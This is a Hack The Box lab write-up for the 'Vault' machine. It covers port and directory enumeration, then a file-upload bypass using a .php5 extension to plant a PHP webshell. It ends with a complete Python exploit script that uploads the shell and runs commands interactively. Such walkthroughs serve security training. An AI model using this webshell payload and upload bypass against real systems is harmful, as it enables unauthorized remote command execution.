[HTB] Vault
Foothold discovery
Attacker discover the 80 port during the nmap scan:
nmap -p- -sV 10.129.87.172

Attacker enter the :80 port

Attacker discovers the /sparklays endpoint based on the information that the page contains

Since the access is forbidden attacker decide to enumerate the enpoint in order to find out if some endpoints are accessible to unauthorized user
File enumeration:
gobuster dir -w ~/SecLists/Discovery/Web-Content/raft-medium-files.txt -u http://10.129.87.172/sparklays/
Discovered endpoints:
/login.php /admin.php
Folder enumeration:
gobuster dir -w ~/SecLists/Discovery/Web-Content/raft-medium-directories.txt -u http://10.129.87.172/sparklays/
Discovered folders:
/design
File enumeration inside found folder:
gobuster dir -w ~/SecLists/Discovery/Web-Content/raft-medium-files.txt -u http://10.129.87.172/sparklays/design
Discovered endpoints:
/design/changelogo.php
Folder enumeration inside found folder:
gobuster dir -w ~/SecLists/Discovery/Web-Content/raft-medium-directories.txt -u http://10.129.87.172/sparklays/design
Discovered folders:
/design/uploads
Attacker go to discovered /design/changelogo.php endpoint.

Attacker upload the webshell with extension validation bypass (file with .php5 extension instead of .php)

Attacker enter the uploaded webshell

Foothold flow
Attacker enter the http://<IP>/sparklays/design/changelogo.php subpage
Attacker upload the webshell with .php5 extension
Attacker enter the webshell
Exploit written by me:
# Usage: python3 exploit.py <VICTIM_IP> <LOCAL_IP> <SHELL_LISTENER>
import requests
import sys
import time
import random
import socket
# Getting the information from attacker
ip = ""
local_ip = ""
port = ""
try:
ip = sys.argv[1]
local_ip = sys.argv[2]
port = sys.argv[3]
except:
print("Usage: python3 exploit.py <VICTIM_IP> <LOCAL_IP> <SHELL_LISTENER>")
sys.exit()
print("Attacking the target " + ip + ".")
time.sleep(1)
print("Setting up the listener on port " + port + ".")
time.sleep(1)
##### Uploading the webshell #####
# Configure proxies to route traffic through Burp Suite
proxies = {
"http": "http://127.0.0.1:8080",
"https": "http://127.0.0.1:8080",
}
# Prepare temporary file for upload
file_contents = "<?php system($_REQUEST['cmd']); ?>"
file_name = "shell" + str(random.randint(1000000,1999999)) + ".php5"
# Generate a custom boundary and add it to header
boundary = "----WebKitFormBoundaryOLFubEqWo3Dfnb5f"
headers = {
"Content-Type": f"multipart/form-data; boundary={boundary}"
}
# Specify the url
url = "http://" + ip + "/sparklays/design/changelogo.php"
# Create the request body
body = (
f"--{boundary}\r\n"
f"Content-Disposition: form-data; name=\"file\"; filename=\"{file_name}\"\r\n"
f"Content-Type: application/x-php\r\n\r\n"
f"{file_contents}\r\n"
f"--{boundary}\r\n"
f"Content-Disposition: form-data; name=\"submit\"\r\n\r\n"
f"upload file\r\n"
f"--{boundary}\r\n"
)
x = requests.post(url, body, proxies=proxies,headers=headers)
print("File " + file_name + " uploaded.")
##### Entering the webshell #####
while True:
payload = input("Shell> ")
attack_url = "http://" + ip + "/sparklays/design/uploads/" + file_name + "?cmd=" + payload
response = requests.get(attack_url, proxies=proxies)
print(response.text)
Last updated